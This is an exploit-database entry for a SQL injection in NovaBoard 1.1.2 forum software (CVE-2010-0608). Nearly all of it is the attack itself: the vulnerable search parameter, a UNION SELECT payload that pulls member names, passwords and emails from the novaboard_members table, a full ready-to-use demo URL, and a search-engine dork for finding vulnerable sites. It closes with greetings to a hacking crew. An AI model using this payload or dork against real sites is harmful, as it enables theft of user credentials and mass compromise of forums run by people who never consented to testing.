Novaboard 1.1.2 - SQL Injection

Author: Delibey
type: webapps
platform: php
port: 
date_added: 2010-01-27 
date_updated:  
verified: 1 
codes: OSVDB-62002;CVE-2010-0608 
tags: 
aliases:  
screenshot_url:  
application_url: 

#############################################################
# NovaBoard v1.1.2 SQL Injection Vulnerability

# Plugin Home: http://www.novaboard.net/

# Author: Delibey

# Site: www.1923turk.com

##############################################################


# Download   Script  : http://novaboard.googlecode.com/files/NovaBoard1.1.2.zip



# Exploit: index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=[SQL-inj]


#  1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+

#  Dork  : "Powered by NovaBoard v1.1.2"

# Demo: http://server/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+


##############################################################
# Greetz: Manas58 - Baybora - Gamoscu - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################